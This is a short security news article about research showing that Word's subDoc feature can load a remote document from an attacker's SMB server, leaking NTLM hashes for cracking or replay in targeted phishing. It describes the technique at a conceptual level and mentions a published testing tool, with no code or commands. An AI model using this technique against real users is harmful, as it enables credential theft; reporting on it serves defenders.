Little-Known MS Word Feature Can Be Used to Steal Passwords

Researchers from Rhino Labs have described a new method for stealing Windows credentials using a little-known MS Word feature called subDoc. This feature allows a document to load another document into its body. It can also be used to remotely load subDoc files into the main document, making it possible to exploit this functionality for malicious purposes.

How the Attack Works

The new technique is based on the classic Pass-the-hash attack, a type of replay attack. This method allows an attacker to authenticate on a remote server that uses the NTLM or LM authentication protocol. The attack can be used against any server or service that relies on NTLM or LM authentication, regardless of the victim’s operating system.

In systems using NTLM authentication, passwords are never transmitted in plain text. Instead, they are sent as hashes during the challenge-response authentication process. Attackers can create a Word file that loads a subdocument from a malicious SMB server under their control. By intercepting SMB requests, they can obtain the NTLM hash. There are many tools available today that can crack these hashes and extract credentials. With this information, attackers can access the victim’s computer or network as if they were the original user.

Targeted Phishing Campaigns

This type of attack is particularly effective for targeted phishing campaigns aimed at high-value targets such as businesses or government agencies, according to experts.

Detection and Prevention

According to researchers, this attack method is not yet widely known, so most antivirus solutions do not detect it. The researchers have published a tool on GitHub called SubDoc Injector, which allows users to create malicious Word documents. This tool is intended to help system administrators and security professionals conduct their own testing and assessments.